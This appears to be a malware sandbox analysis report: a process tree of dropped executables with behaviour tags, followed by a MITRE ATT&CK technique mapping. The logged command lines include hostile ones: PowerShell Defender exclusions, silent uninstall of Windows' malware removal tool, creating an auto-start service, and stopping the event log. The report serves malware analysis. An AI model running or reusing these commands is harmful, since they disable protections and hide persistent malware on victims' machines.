        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        5⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:868
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.0.275209716\2020563201" -parentBuildID 20221007134813 -prefsHandle 1184 -prefMapHandle 1176 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {797fef6b-1fce-4509-bb02-eab778f2dbf2} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1264 110d5558 gpu
        6⤵
        
        PID:2748
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.1.1947579482\68757425" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8025ec50-71f8-4902-884d-0608383b8cee} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1496 102fa458 socket
        6⤵
        
        PID:3152
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.2.2098601060\1785183293" -childID 1 -isForBrowser -prefsHandle 2180 -prefMapHandle 2060 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b067d7c3-ec68-4501-8380-304e0f01275e} 868 "\\.\pipe\gecko-crash-server-pipe.868" 1896 1a2bf558 tab
        6⤵
        
        PID:3724
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.3.112411928\670127742" -childID 2 -isForBrowser -prefsHandle 2740 -prefMapHandle 2736 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a933d1b2-59b6-40da-950b-8eac12096cee} 868 "\\.\pipe\gecko-crash-server-pipe.868" 2752 f63c58 tab
        6⤵
        
        PID:2796
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.4.1500940490\1547223835" -childID 3 -isForBrowser -prefsHandle 3916 -prefMapHandle 3852 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fc448eea-738b-4fd8-842d-32d2d5dcb44c} 868 "\\.\pipe\gecko-crash-server-pipe.868" 3904 1a235f58 tab
        6⤵
        
        PID:2196
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.5.398400492\2143024119" -childID 4 -isForBrowser -prefsHandle 4040 -prefMapHandle 4044 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {49538a8c-0147-42c7-928d-cae11e25742d} 868 "\\.\pipe\gecko-crash-server-pipe.868" 4032 2109e758 tab
        6⤵
        
        PID:880
      - C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="868.6.1984653541\1144401166" -childID 5 -isForBrowser -prefsHandle 4152 -prefMapHandle 4156 -prefsLen 26432 -prefMapSize 233444 -jsInitHandle 824 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c66806cf-80f3-49d7-8c76-40b0b81ac6a1} 868 "\\.\pipe\gecko-crash-server-pipe.868" 4144 2109f958 tab
        6⤵
        
        PID:2556
- - C:\Users\Admin\AppData\Local\Temp\10106240101\f8860f532a.exe
    "C:\Users\Admin\AppData\Local\Temp\10106240101\f8860f532a.exe"
    3⤵
    - Modifies Windows Defender DisableAntiSpyware settings
    - Modifies Windows Defender Real-time Protection settings
    - Modifies Windows Defender TamperProtection settings
    - Modifies Windows Defender notification settings
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Windows security modification
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe
    "C:\Users\Admin\AppData\Local\Temp\10106250101\AhFKwnS.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4048
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 640
      4⤵
      Loads dropped DLL
      Program crash
      PID:6708
- - C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe
    "C:\Users\Admin\AppData\Local\Temp\10106260101\v6Oqdnc.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:6812
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6812 -s 1200
      4⤵
      Loads dropped DLL
      Program crash
      PID:6984
- - C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe
    "C:\Users\Admin\AppData\Local\Temp\10106270101\OEHBOHk.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:7148
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4888
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:3608
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        Drops file in Windows directory
        
        PID:4400
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3220
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3660
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3872
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      Suspicious use of AdjustPrivilegeToken
      PID:3916
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "DWENDQPG"
      4⤵
      Launches sc.exe
      PID:4284
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "DWENDQPG" binpath= "C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4440
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:4572
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "DWENDQPG"
      4⤵
      Launches sc.exe
      PID:4588
- - C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
    "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4312
  - - C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe
      "C:\Users\Admin\AppData\Local\Temp\10106280101\MCxU5Fj.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:4364
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4364 -s 1020
        5⤵
        Program crash
        
        PID:1864
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4312 -s 504
      4⤵
      Loads dropped DLL
      Program crash
      PID:4552
- - C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe
    "C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2124
  - - C:\Windows\Temp\{D78CF13A-322B-4EC3-A278-C6E22DD42ADA}\.cr\Y87Oyyz.exe
      "C:\Windows\Temp\{D78CF13A-322B-4EC3-A278-C6E22DD42ADA}\.cr\Y87Oyyz.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10106290101\Y87Oyyz.exe" -burn.filehandle.attached=180 -burn.filehandle.self=188
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:2236
    - - C:\Windows\Temp\{18C64030-2FC5-4096-B354-8CD493121B87}\.ba\SplashWin.exe
        
        C:\Windows\Temp\{18C64030-2FC5-4096-B354-8CD493121B87}\.ba\SplashWin.exe
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2892
      - C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        
        C:\Users\Admin\AppData\Roaming\osd_patch_beta\SplashWin.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:2776
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: MapViewOfSection
        
        PID:340
        
        C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
        
        C:\Users\Admin\AppData\Local\Temp\Syncsign_v1.exe
        8⤵
        
        PID:5488
- - C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe
    "C:\Users\Admin\AppData\Local\Temp\10106300101\ce4pMzk.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Local\Caches\CMnYnzVl\Anubis.exe""
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious use of AdjustPrivilegeToken
      PID:5336
- - C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
    "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:2316
  - - C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
      4⤵
      Executes dropped EXE
      PID:1432
  - - C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe
      "C:\Users\Admin\AppData\Local\Temp\10106310101\mAtJWNv.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3108
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 508
      4⤵
      Program crash
      PID:4848
- - C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
    "C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe"
    3⤵
    - Executes dropped EXE
    PID:5564
  - - C:\Users\Admin\AppData\Local\Temp\onefile_5564_133856778141084000\chromium.exe
      C:\Users\Admin\AppData\Local\Temp\10106320101\SvhQA35.exe
      4⤵
      Executes dropped EXE
      PID:5840
- - C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe
    "C:\Users\Admin\AppData\Local\Temp\10106330101\FvbuInU.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Modifies system certificate store
    PID:2248
- - C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe
    "C:\Users\Admin\AppData\Local\Temp\10106340101\Ps7WqSx.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:6548

C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
C:\ProgramData\ztlktuiiawkf\ckonftponqgz.exe
1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4648
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:4760
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    - Drops file in Windows directory
    PID:1356
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4976
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:4992
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5048
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:5088
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1536
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2268

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Power Settings

T1653

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

Modify Registry

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Virtualization/Sandbox Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Query Registry

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion